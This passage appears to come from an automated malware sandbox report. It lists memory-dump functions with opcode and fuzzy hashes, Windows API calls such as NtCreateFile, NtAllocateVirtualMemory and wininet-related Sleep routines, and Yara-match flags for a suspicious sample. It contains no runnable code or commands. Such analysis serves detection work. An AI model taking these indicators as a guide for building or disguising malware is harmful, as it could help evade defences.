• Opcode Fuzzy Hash: 2fef18e462187a8539695b6c9dc790c39f703ef074ccadb13652abde778d70bd
• Instruction Fuzzy Hash: 3D90026134500406D1127199C414A065009E7D5385F91C022E1414559DC6658953B172
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 245f1f95a9f89314cc5c30cab660a4f95c8de4e4b205de4db42b3892ea642b88
• Instruction ID: ac9727525f61f1e0ddd46b97801161e1b831ee6a20077452039de4dde61bdc69
• Opcode Fuzzy Hash: 245f1f95a9f89314cc5c30cab660a4f95c8de4e4b205de4db42b3892ea642b88
• Instruction Fuzzy Hash: 2890026128500806D1507199C414B075006E7D4641F51C021E0014558DC656896576F1
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2f8174ff085aa43529a54e79c7f6f7f8638ce6342c4c624baaf19cc561947cd5
• Instruction ID: 54ec3ed256d6df5df8d37bc53c03a640bdf2cf645efd759e92b27bad8fcbbce8
• Opcode Fuzzy Hash: 2f8174ff085aa43529a54e79c7f6f7f8638ce6342c4c624baaf19cc561947cd5
• Instruction Fuzzy Hash: C990027124544006D1507199C444A0BA005B7E4341F51C421E0415558CC6558856B261
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9e3ec94a91f246e3d0086c28f2db3970ddc1c52f389cb00c29ca499000b3b0bc
• Instruction ID: 8ed8709d07a9ed7a078d7d3d1556c05683607df1ee6351610208c0b68c8ffdbb
• Opcode Fuzzy Hash: 9e3ec94a91f246e3d0086c28f2db3970ddc1c52f389cb00c29ca499000b3b0bc
• Instruction Fuzzy Hash: 6290027124540406D1107199C808B475005A7D4342F51C021E5154559EC6A5C8917571
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3c5d1bcd779f2b8a83dd26fb4b671622e3202a03d80f71d59e4e3db1ecff1c84
• Instruction ID: 0906ae23ba91a3233cb3e26d464e4886b9e2180222ee0b1d562fc76b3509c9b3
• Opcode Fuzzy Hash: 3c5d1bcd779f2b8a83dd26fb4b671622e3202a03d80f71d59e4e3db1ecff1c84
• Instruction Fuzzy Hash: F990026124544446D1507299C804F0F9105A7E5242F91C029E4146558CC95588557761
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 54c3c48cb2dd2f457521f119d16ae5302f990a8243326ebbace6e5fefcd4fc5d
• Instruction ID: 9cb97e0911c8f7a863c9817c26fb67e25a8827e833a5e7c9571ce7e9a1002987
• Opcode Fuzzy Hash: 54c3c48cb2dd2f457521f119d16ae5302f990a8243326ebbace6e5fefcd4fc5d
• Instruction Fuzzy Hash: E0900265265000060155B599860490B5445B7DA391391C025F1406594CC66188657361
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 371df96173f320c94793ad9ed7d593c684fbe9efaca7f80939f4d56a893f2204
• Instruction ID: 550585e3878699d10e86e0adcfdd1cb0a3a293378617cd8f0252714687fe8a84
• Opcode Fuzzy Hash: 371df96173f320c94793ad9ed7d593c684fbe9efaca7f80939f4d56a893f2204
• Instruction Fuzzy Hash: 8F900271A490001691507199C814A469006B7E4781B55C021E0504558CC9948A5573E1
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: fe551ee56048534049748bb8c7f7f65fee9dad9db73e6355af3d90fa6f6ffeeb
• Instruction ID: 8c7b1b171b30ef49206f13fa1eba31cfe6530f12daa99065c91329b3c58d5d13
• Opcode Fuzzy Hash: fe551ee56048534049748bb8c7f7f65fee9dad9db73e6355af3d90fa6f6ffeeb
• Instruction Fuzzy Hash: 149002E1245140964510B299C404F0A9505A7E4241B51C026E1044564CC5658851B175
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1d1d5ab5cc7cc20feed391799308b78b432d8b10b1430dbded42ff775b0133df
• Instruction ID: cf2dbe57dd51d8e2a4fb9ffc11203562084c10e7ff3dced7e32232b0a09b7866
• Opcode Fuzzy Hash: 1d1d5ab5cc7cc20feed391799308b78b432d8b10b1430dbded42ff775b0133df
• Instruction Fuzzy Hash: 7F90027124500806D1147199C804A865005A7D4341F51C021E6014659ED6A588917171
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7b07ea4f71422a59b0d68333466d2f6a4b976fe4bd2426f55811d8fca1566ab4
• Instruction ID: ff64f5f5ff32471214d6c709fb3d14d1b348e9b852e2d293ec82baa86b426193
• Opcode Fuzzy Hash: 7b07ea4f71422a59b0d68333466d2f6a4b976fe4bd2426f55811d8fca1566ab4
• Instruction Fuzzy Hash: 7F90027524904446D5107599D804E875005A7D4345F51D421E041459CDC6948861B161
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9126b2c2201d0226219994bf6623e8153371eb9b2699bbfcdef9ab0c2a392e38
• Instruction ID: 052342e678cf9187717ada033db46855a7430b849b8b9aa1c9218fff01be8a4c
• Opcode Fuzzy Hash: 9126b2c2201d0226219994bf6623e8153371eb9b2699bbfcdef9ab0c2a392e38
• Instruction Fuzzy Hash: FC90026124904446D1107599D408E065005A7D4245F51D021E1054599DC6758851B171
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d57cd515f99dd680f5682487e59087a7d6773ddac8d4f2915b976daa2521b252
• Instruction ID: dc50ff2618b8245d2463c8d8e2ae9c05240511086bfe35e703504527662113d7
• Opcode Fuzzy Hash: d57cd515f99dd680f5682487e59087a7d6773ddac8d4f2915b976daa2521b252
• Instruction Fuzzy Hash: 9890027124500407D1107199D508B075005A7D4241F51D421E041455CDD69688517161
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ed780b5e215a2da9274a21ef2243f01ae0b3a62df6a733069ea816a0e6b7b3fa
• Instruction ID: 5e65c9f227cd0ed0537ff8069e32ca84190fd94a81cca94fa4ec1e9371f9d701
• Opcode Fuzzy Hash: ed780b5e215a2da9274a21ef2243f01ae0b3a62df6a733069ea816a0e6b7b3fa
• Instruction Fuzzy Hash: BF90026164900406D1507199D418B065015A7D4241F51D021E0014558DC6998A5576E1
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1d92dec7e3b16569d44fd35f3d7f09123a4e8be3b25643d2eafd76448c4c40d8
• Instruction ID: 95a683b27d81680177687f79d1073793fab41e8d7a19b45872e7718bc892d633
• Opcode Fuzzy Hash: 1d92dec7e3b16569d44fd35f3d7f09123a4e8be3b25643d2eafd76448c4c40d8
• Instruction Fuzzy Hash: 70900271345000569510B6D9D804E4A9105A7F4341B51D025E4004558CC59488617161
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: cefea8671b798f5c9e8f8d3b42fa2272705168de28ab9de170cc254a2cbbd016
• Instruction ID: 023844e9b30c8c1408a4dc9698d50e3cdb2ea3c9afced73da6660d673aca3b83
• Opcode Fuzzy Hash: cefea8671b798f5c9e8f8d3b42fa2272705168de28ab9de170cc254a2cbbd016
• Instruction Fuzzy Hash: 2690027124904846D1507199C404E465015A7D4345F51C021E0054698DD6658D55B6A1
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: db1f69420103fde52786b18adc7292a583c39f139e8ae6fa981d5fe3faf0a1ef
• Instruction ID: dfa41f4e83a4a768442bfeacbe218a259e7522816fbe0aad57ef4137dd445adb
• Opcode Fuzzy Hash: db1f69420103fde52786b18adc7292a583c39f139e8ae6fa981d5fe3faf0a1ef
• Instruction Fuzzy Hash: 4090027164900806D1607199C414B465005A7D4341F51C021E0014658DC7958A5576E1
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 03d63450be5a4265054fd0f4f12ab9a3ab83ccfd36769bcffd4f1f85cfe4c394
• Instruction ID: 0642f80cd08d381db3d83c543d7d6afeeb987cf0b7083e3a72c894fe9eb13c09
• Opcode Fuzzy Hash: 03d63450be5a4265054fd0f4f12ab9a3ab83ccfd36769bcffd4f1f85cfe4c394
• Instruction Fuzzy Hash: AA90027124500846D1107199C404F465005A7E4341F51C026E0114658DC655C8517561
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
• Instruction ID: 4a7ab07b44d6136e6226d333d157ca90fb9c87a0c67772db8e3f1d1db80acb2d
• Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
• Instruction Fuzzy Hash:
Uniqueness
Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017CFDFA
                                                                    Strings
                                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 017CFE01
                                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 017CFE2B
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                    • API String ID: 885266447-3903918235
                                                                    • Opcode ID: 040f9a1f733bf94000c2e126ee1664897dc1de3505e3d4df87bff845ab677267
                                                                    • Instruction ID: 326d02498f02f25a2659a37cd36b26988af972938c4fd83efcbee36b9d59a2a3
                                                                    • Opcode Fuzzy Hash: 040f9a1f733bf94000c2e126ee1664897dc1de3505e3d4df87bff845ab677267
                                                                    • Instruction Fuzzy Hash: 25F0FC72200501BFE6201A45DC05F23FF5ADB44B30F14431CF614561E1D962F86086F0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Executed Functions

                                                                    APIs
                                                                    • NtCreateFile.NTDLL(00000060,00000000,.z`,003A3B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,003A3B87,007A002E,00000000,00000060,00000000,00000000), ref: 003A81FD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.504313193.0000000000390000.00000040.00000001.sdmp, Offset: 00390000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateFile
                                                                    • String ID: .z`
                                                                    • API String ID: 823142352-1441809116
                                                                    • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                    • Instruction ID: 8fb1e551a534163b7b27f660d93acce64766b34f662d7a4adf46aca05745f39e
                                                                    • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                    • Instruction Fuzzy Hash: 17F0B6B2200108ABCB08CF88DC85DEB77ADAF8C754F158248BA0D97241C630E8118BA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • NtClose.NTDLL( =:,?,?,003A3D20,00000000,FFFFFFFF), ref: 003A8305
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.504313193.0000000000390000.00000040.00000001.sdmp, Offset: 00390000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Close
                                                                    • String ID: =:
                                                                    • API String ID: 3535843008-1810370302
                                                                    • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                    • Instruction ID: 9890879f13047cfbec14acd33e800fc5c01857aa6e4398f69699732214788259
                                                                    • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                    • Instruction Fuzzy Hash: BED012756002146BD710EF98CC45ED7775CEF44750F154455BA185B242C930F90086E0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • NtReadFile.NTDLL(?,?,FFFFFFFF,003A3A01,?,?,?,?,003A3A01,FFFFFFFF,?,B=:,?,00000000), ref: 003A82A5
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.504313193.0000000000390000.00000040.00000001.sdmp, Offset: 00390000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FileRead
                                                                    • String ID:
                                                                    • API String ID: 2738559852-0
                                                                    • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                    • Instruction ID: b4b32cbc914bccee926f830cde587237dfa4ea523405982f4aacbcc099a16c8f
                                                                    • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                    • Instruction Fuzzy Hash: FFF0A4B2200208ABCB14DF89DC85EEB77ADEF8C754F158248BA1D97241DA30E8118BA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00392D11,00002000,00003000,00000004), ref: 003A83C9
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.504313193.0000000000390000.00000040.00000001.sdmp, Offset: 00390000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateMemoryVirtual
                                                                    • String ID:
                                                                    • API String ID: 2167126740-0
                                                                    • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                    • Instruction ID: 8deaf05e3f845cb8b5f95ca9b00207eed24f98a1ba32a98eea9ca377776b7ec1
                                                                    • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                    • Instruction Fuzzy Hash: C1F015B2200208ABCB14DF89CC81EEB77ADEF88750F118148BE0897241CA30F810CBE0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.507433539.0000000002DA0000.00000040.00000001.sdmp, Offset: 02DA0000, based on PE: true
                                                                    • Associated: 0000000E.00000002.507743470.0000000002EBB000.00000040.00000001.sdmp
                                                                    • Associated: 0000000E.00000002.507767036.0000000002EBF000.00000040.00000001.sdmp
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: fe363d4220ff6706cfc9a514b9f225c328aaeff67d56dc1c2dbcf319573f8a67
                                                                    • Instruction ID: 80b8b70afa8f64e44aa004434d85cfc09c7627488819853e6200c0beb2e3e41e
                                                                    • Opcode Fuzzy Hash: fe363d4220ff6706cfc9a514b9f225c328aaeff67d56dc1c2dbcf319573f8a67
                                                                    • Instruction Fuzzy Hash: 8090027135181042D20065694C15B47040997D0343F51D525A0144554CC9558861A561
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.507433539.0000000002DA0000.00000040.00000001.sdmp, Offset: 02DA0000, based on PE: true
                                                                    • Associated: 0000000E.00000002.507743470.0000000002EBB000.00000040.00000001.sdmp
                                                                    • Associated: 0000000E.00000002.507767036.0000000002EBF000.00000040.00000001.sdmp
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 612b7b4db6e6e0de0a57e499c1825a626dc48e9cb3fa9965cced9f2492049853
                                                                    • Instruction ID: 93380f07473dc28bf91c37112c2affb270ee68ed9bc8d3a078d07e5ce0bff966
                                                                    • Opcode Fuzzy Hash: 612b7b4db6e6e0de0a57e499c1825a626dc48e9cb3fa9965cced9f2492049853
                                                                    • Instruction Fuzzy Hash: A490027134101413D11161594905747040D97D0281F91D822A0414558D96968952F161
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.507433539.0000000002DA0000.00000040.00000001.sdmp, Offset: 02DA0000, based on PE: true
                                                                    • Associated: 0000000E.00000002.507743470.0000000002EBB000.00000040.00000001.sdmp
                                                                    • Associated: 0000000E.00000002.507767036.0000000002EBF000.00000040.00000001.sdmp
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 5620efe140b4aff2a9f83daf1a27ef0b36f516dc34970b8a440459eb3922e934
                                                                    • Instruction ID: 98bfb9b3829a0c0e3026681f19b7f2775365b40ef61f293d529ea3c9e58f86c1
                                                                    • Opcode Fuzzy Hash: 5620efe140b4aff2a9f83daf1a27ef0b36f516dc34970b8a440459eb3922e934
                                                                    • Instruction Fuzzy Hash: C4900271382051525545B1594805547440AA7E0281791D422A1404950C85669856E661
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.507433539.0000000002DA0000.00000040.00000001.sdmp, Offset: 02DA0000, based on PE: true
                                                                    • Associated: 0000000E.00000002.507743470.0000000002EBB000.00000040.00000001.sdmp
                                                                    • Associated: 0000000E.00000002.507767036.0000000002EBF000.00000040.00000001.sdmp
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: ff226bba34929ea3fd71d5713bd94781ab8aaa6c6daca2a60a7d96d53bcabf5a
                                                                    • Instruction ID: 648112b14818366299619406fee4f91f7447b685b163eb161246e0ed0cfd67b6
                                                                    • Opcode Fuzzy Hash: ff226bba34929ea3fd71d5713bd94781ab8aaa6c6daca2a60a7d96d53bcabf5a
                                                                    • Instruction Fuzzy Hash: 639002B138101442D10061594815B470409D7E1341F51D425E1054554D8659CC52B166
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.507433539.0000000002DA0000.00000040.00000001.sdmp, Offset: 02DA0000, based on PE: true
                                                                    • Associated: 0000000E.00000002.507743470.0000000002EBB000.00000040.00000001.sdmp
                                                                    • Associated: 0000000E.00000002.507767036.0000000002EBF000.00000040.00000001.sdmp
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 4de07b7ad8d8afd08c52a9a4a611fd51657e7ef4585aa946095eebb884350d69
                                                                    • Instruction ID: d29021cfacae72ca0a4fbe3881abf2bf566a5dd0f42fef805640f74ad45cfb57
                                                                    • Opcode Fuzzy Hash: 4de07b7ad8d8afd08c52a9a4a611fd51657e7ef4585aa946095eebb884350d69
                                                                    • Instruction Fuzzy Hash: 4F9002B134101402D14071594805787040997D0341F51D421A5054554E86998DD5B6A5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.507433539.0000000002DA0000.00000040.00000001.sdmp, Offset: 02DA0000, based on PE: true
                                                                    • Associated: 0000000E.00000002.507743470.0000000002EBB000.00000040.00000001.sdmp
                                                                    • Associated: 0000000E.00000002.507767036.0000000002EBF000.00000040.00000001.sdmp
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 36ba574541e3cf464aa7fd36fb305c0212308380875a9e6f975f470d158e1284
                                                                    • Instruction ID: 9c12bf8799103336e146d2f25912bd92c366abee4183fc5eb3874c9c718b3007
                                                                    • Opcode Fuzzy Hash: 36ba574541e3cf464aa7fd36fb305c0212308380875a9e6f975f470d158e1284
                                                                    • Instruction Fuzzy Hash: 0390027134109802D1106159880578B040997D0341F55D821A4414658D86D58891B161
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.507433539.0000000002DA0000.00000040.00000001.sdmp, Offset: 02DA0000, based on PE: true
                                                                    • Associated: 0000000E.00000002.507743470.0000000002EBB000.00000040.00000001.sdmp
                                                                    • Associated: 0000000E.00000002.507767036.0000000002EBF000.00000040.00000001.sdmp
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: e00b98b058e3cc8a13f97a8858bc26b15fb7f0ad84254cf53434de1c8b058f24
                                                                    • Instruction ID: be2def7077192d5ec341fe3eb65e95493b94e8fd3ed890120835686b6ed5b4c2
                                                                    • Opcode Fuzzy Hash: e00b98b058e3cc8a13f97a8858bc26b15fb7f0ad84254cf53434de1c8b058f24
                                                                    • Instruction Fuzzy Hash: A490027134101842D10061594805B87040997E0341F51D426A0114654D8655C851B561
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.507433539.0000000002DA0000.00000040.00000001.sdmp, Offset: 02DA0000, based on PE: true
                                                                    • Associated: 0000000E.00000002.507743470.0000000002EBB000.00000040.00000001.sdmp
                                                                    • Associated: 0000000E.00000002.507767036.0000000002EBF000.00000040.00000001.sdmp
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 1266053e0624e84190002eea55005231e742d2653c6f288361403a0c65d2259a
                                                                    • Instruction ID: e27c4d175a7e1c624aff81173053a35d18a5a66131d9ae82e08179d5645eebc8
                                                                    • Opcode Fuzzy Hash: 1266053e0624e84190002eea55005231e742d2653c6f288361403a0c65d2259a
                                                                    • Instruction Fuzzy Hash: 6790027134101802D1807159480568B040997D1341F91D425A0015654DCA558A59B7E1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.507433539.0000000002DA0000.00000040.00000001.sdmp, Offset: 02DA0000, based on PE: true
                                                                    • Associated: 0000000E.00000002.507743470.0000000002EBB000.00000040.00000001.sdmp
                                                                    • Associated: 0000000E.00000002.507767036.0000000002EBF000.00000040.00000001.sdmp
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 67591cb9bd3d7e390bfc1c8e3ba06b6394719ca1263985717c855783a18ee480
                                                                    • Instruction ID: 8dfff9d09e5800f4c398e8381a34d37248fad5e6f48d03c70f7ee019029f675e
                                                                    • Opcode Fuzzy Hash: 67591cb9bd3d7e390bfc1c8e3ba06b6394719ca1263985717c855783a18ee480
                                                                    • Instruction Fuzzy Hash: 2E90027134505842D14071594805A87041997D0345F51D421A0054694D96658D55F6A1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.507433539.0000000002DA0000.00000040.00000001.sdmp, Offset: 02DA0000, based on PE: true
                                                                    • Associated: 0000000E.00000002.507743470.0000000002EBB000.00000040.00000001.sdmp
                                                                    • Associated: 0000000E.00000002.507767036.0000000002EBF000.00000040.00000001.sdmp
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 652a796560c9ab23acc86f75b6088343e6bd8816c94244eb77c103ec49f5e6f8
                                                                    • Instruction ID: d343905c2df847db657a8a9a1278803557a5681bda651723ae433dca4fa1e5b3
                                                                    • Opcode Fuzzy Hash: 652a796560c9ab23acc86f75b6088343e6bd8816c94244eb77c103ec49f5e6f8
                                                                    • Instruction Fuzzy Hash: C790027135115402D11061598805747040997D1241F51D821A0814558D86D58891B162
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.507433539.0000000002DA0000.00000040.00000001.sdmp, Offset: 02DA0000, based on PE: true
                                                                    • Associated: 0000000E.00000002.507743470.0000000002EBB000.00000040.00000001.sdmp
                                                                    • Associated: 0000000E.00000002.507767036.0000000002EBF000.00000040.00000001.sdmp
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 982bb797a2c83ea3c4988c0a18451dd30d7257992fb8f74fef2d185a21daa676
                                                                    • Instruction ID: bfc64372f9d008c206734783c7428e8e49b92788553c16e9eec086d3c118f933
                                                                    • Opcode Fuzzy Hash: 982bb797a2c83ea3c4988c0a18451dd30d7257992fb8f74fef2d185a21daa676
                                                                    • Instruction Fuzzy Hash: 2A90027935301002D1807159580964B040997D1242F91E825A0005558CC9558869A361
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.507433539.0000000002DA0000.00000040.00000001.sdmp, Offset: 02DA0000, based on PE: true
                                                                    • Associated: 0000000E.00000002.507743470.0000000002EBB000.00000040.00000001.sdmp
                                                                    • Associated: 0000000E.00000002.507767036.0000000002EBF000.00000040.00000001.sdmp
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0

APIs
Memory Dump Source
• Source File: 0000000E.00000002.507433539.0000000002DA0000.00000040.00000001.sdmp, Offset: 02DA0000, based on PE: true
• Associated: 0000000E.00000002.507743470.0000000002EBB000.00000040.00000001.sdmp
• Associated: 0000000E.00000002.507767036.0000000002EBF000.00000040.00000001.sdmp
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0

APIs
Memory Dump Source
• Source File: 0000000E.00000002.507433539.0000000002DA0000.00000040.00000001.sdmp, Offset: 02DA0000, based on PE: true
• Associated: 0000000E.00000002.507743470.0000000002EBB000.00000040.00000001.sdmp
• Associated: 0000000E.00000002.507767036.0000000002EBF000.00000040.00000001.sdmp
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0

APIs
• PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 003972BA
• PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 003972DB
Strings
Memory Dump Source
• Source File: 0000000E.00000002.504313193.0000000000390000.00000040.00000001.sdmp, Offset: 00390000, based on PE: false
Yara matches
Similarity
• API ID: MessagePostThread
• String ID: 3333
• API String ID: 1836367815-2924271548

APIs
• Sleep.KERNELBASE(000007D0), ref: 003A6F78
Strings
Memory Dump Source
• Source File: 0000000E.00000002.504313193.0000000000390000.00000040.00000001.sdmp, Offset: 00390000, based on PE: false
Yara matches
Similarity
• API ID: Sleep
• String ID: net.dll$wininet.dll
• API String ID: 3472027048-1269752229

APIs
• Sleep.KERNELBASE(000007D0), ref: 003A6F78
Strings
Memory Dump Source
• Source File: 0000000E.00000002.504313193.0000000000390000.00000040.00000001.sdmp, Offset: 00390000, based on PE: false
Yara matches
Similarity
• API ID: Sleep
• String ID: net.dll$wininet.dll
